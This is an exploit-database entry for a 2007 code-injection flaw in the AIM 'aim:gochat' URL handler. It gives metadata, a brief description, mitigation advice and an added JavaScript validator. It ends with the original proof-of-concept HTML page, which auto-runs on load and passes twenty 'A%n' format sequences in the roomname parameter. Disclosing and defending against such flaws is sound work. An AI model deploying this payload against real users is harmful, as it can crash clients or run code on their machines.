vendor:
by: Unknown
CVSS: 9.8 (CRITICAL)
CWE: 94 (Code Injection)
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-0547
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MOAB-20-01-2007

This is a code injection vulnerability that allows an attacker to execute arbitrary code by manipulating the 'roomname' parameter in the 'aim:gochat' URL scheme. The proof of concept uses a loop to build a string of 20 URL-escaped 'A%n' sequences and then appends it to the 'aim:gochat?roomname=' prefix. When 'window.location' is set to this string, the code injection occurs.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before using it in URLs or executing it as code.
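
One way to apply this mitigation to `aim:` links before they are handed to the registered handler, shown as an added example that is not part of the original entry. It accepts only `aim:gochat` with a single `roomname` that matches an allowlist, so a decoded name that still contains `%` (as the `A%n` payload does) is refused. The function name, the 64-character limit and the allowed character set are assumptions made for illustration.

```javascript
// Added example: screen aim: links before passing them to an external handler.
// MAX_ROOM_LEN and ROOM_NAME_POLICY are assumed policy values, not AIM limits.
const MAX_ROOM_LEN = 64;
const ROOM_NAME_POLICY = /^[A-Za-z0-9 _.\-]+$/;

function inspectAimLink(href) {
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return { allowed: false, reason: 'unparseable URL' };
  }
  if (url.protocol !== 'aim:') {
    // Out of scope for this check; other schemes need their own policy.
    return { allowed: true, reason: 'not an aim: link' };
  }
  // For a non-special scheme, everything before '?' is an opaque path.
  if (url.pathname.toLowerCase() !== 'gochat') {
    return { allowed: false, reason: 'aim: command not on allowlist' };
  }
  // searchParams percent-decodes once; a stray '%' that is not followed by
  // two hex digits is left in place, so raw and escaped payloads look alike.
  const rooms = url.searchParams.getAll('roomname');
  if (rooms.length !== 1) {
    return { allowed: false, reason: 'expected exactly one roomname' };
  }
  const room = rooms[0];
  if (room.length === 0 || room.length > MAX_ROOM_LEN) {
    return { allowed: false, reason: 'roomname length out of range' };
  }
  if (room.includes('%')) {
    // Covers 'A%n' as well as double-encoded input such as 'A%2525n'.
    return { allowed: false, reason: 'percent sign in decoded roomname' };
  }
  if (!ROOM_NAME_POLICY.test(room)) {
    return { allowed: false, reason: 'roomname has disallowed characters' };
  }
  return { allowed: true, reason: 'ok' };
}

// Constructed inputs: the escaped pattern from this entry and a benign link.
const samplePoc = 'aim:gochat?roomname=' + 'A%25n'.repeat(20);
const sampleOk = 'aim:gochat?roomname=General%20Chat';
console.log(inspectAimLink(samplePoc), inspectAimLink(sampleOk));
```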

Exploit-DB raw data:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-20-01-2007</title>
		<script>
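			function boom() {
				var str = '';
				// Build 20 copies of 'A%n'; escape() turns each into 'A%25n'
				for (var i = 0; i < 20; i++) {
				    str = str + escape('A%n');
				}
				// Prefix with the aim:gochat roomname parameter
				str = 'aim:gochat?roomname=' + str;
				// Navigating to the aim: URL hands it to the registered handler
				window.location = str;
			}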
		</script>
	</head>
	<body onload="boom()">
	</body>
</html>

# milw0rm.com [2007-01-21]